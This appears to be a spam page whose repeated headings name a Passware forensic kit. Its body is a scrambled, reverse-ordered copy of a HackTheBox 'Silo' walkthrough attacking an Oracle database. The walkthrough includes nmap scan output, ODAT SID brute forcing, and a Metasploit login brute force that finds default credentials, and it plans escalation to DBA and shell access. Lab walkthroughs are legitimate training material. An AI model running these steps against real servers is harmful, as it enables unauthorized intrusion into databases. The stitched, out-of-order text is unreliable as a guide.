- Passware kit forensic 12.1 how to#
- Passware kit forensic 12.1 manual#
- Passware kit forensic 12.1 password#
- Passware kit forensic 12.1 windows#
In order to achieve this easily, we can use a tool called ODAT (Oracle Database Attack Tool). In order for us to gain shell access, we might need to escalate our privilege to DBA first and perform some known Oracle attacks. SQL> SELECT * FROM user_role_privs Īs you can see, scott is a low-privilege user on the system. TNS for 64-bit Windows: Version 11.2.0.2.0 - Productionįor starters, we can query for user privileges and roles. Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
Passware kit forensic 12.1 manual#
Now that we have a valid SID and credentials, we can connect to the database for manual enumeration. Think of it as something like sudo - it gives you extra flexibility and higher privileges in case you want to do some database altering, user administration and the list continues. As it turns out, scott is also granted SYSBDA privilege. Valid credentials mean that we can connect to the XE instance and start querying the database for possible information. Auxiliary module execution completedīy the way, we can also figure this one out if we research for common default oracle credentials. Found user/pass of: scott/tiger on 10.10.10.82 with sid XE Msf5 auxiliary (admin/oracle/oracle_login ) > run -j Auxiliary module running as background job 0. Msf5 auxiliary (admin/oracle/oracle_login ) > set SID XE
Msf5 auxiliary (admin/oracle/oracle_login ) > set RHOST 10.10.10.82 Next, we’ll need to identify valid credentials in order to authenticate to the database.įor this task, we can use a metasploit auxiliary module called oracle_login. SIDs found on the 10.10.10.82:1521 server: SAMPLE,SCAN4,XE,XEXDB Credential brute forceīased from the results, we identified four SIDs. Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521 ) 'XE' is a valid SID. Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 serverġ00% |#| Time: 00:10:55 We can use ODAT’s siguesser to discover )] #. obtain a user account (likely through bruteforcing).Discover SIDs (Basically oracles version a unique “database instance”).ODAT It is an open source penetration test tool designed to attack and audit the security of Oracle Database servers. To continue, we will audit this Oracle database with the ODAT tool.
Passware kit forensic 12.1 windows#
With the result of the previous scan, we were able to appreciate that this server probably has Windows Server 2008 R2 and on the other hand it has port 80 (Microsoft IIS httpd 8.5) is enabled.įor this penetration test, we are going to focus on port 1521, which indicates to be an oracle-tns service. Nmap done: 1 IP address (1 host up ) scanned in 171.99 seconds |_ Message signing enabled but not required Service Info: OSs: Windows, Windows Server 2008 R2 - 2012 CPE: cpe:/o:microsoft:windows )] # nmap -sS -T4 -sV -sC 10.10.10.82ġ39/tcp open netbios-ssn Microsoft Windows netbios-ssnĤ45/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-dsġ521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized )Ĥ9152/tcp open msrpc Microsoft Windows RPCĤ9153/tcp open msrpc Microsoft Windows RPCĤ9154/tcp open msrpc Microsoft Windows RPCĤ9155/tcp open msrpc Microsoft Windows RPCĤ9158/tcp open msrpc Microsoft Windows RPCĤ9160/tcp open oracle-tns Oracle TNS listener (requires service name )Ĥ9161/tcp open msrpc Microsoft Windows RPC
Passware kit forensic 12.1 how to#
How to perform a privilege escalation using pass the hash techniqueĪs always we will start enumerating our victim, For this we will perform a simple scan with Nmap, in the following way.
Passware kit forensic 12.1 password#
How to perform a simple port scan with Nmap.I am not responsible for the misuse they may give you. If you want to practice doing the different activities that I will present during this tutorial, I invite you to check the machine Silo de HackTheBox.īefore starting I want to clarify that all my published content is done for educational, informative and ethical purposes.
Today, we are going to perform a penetration test towards an Oracle database server.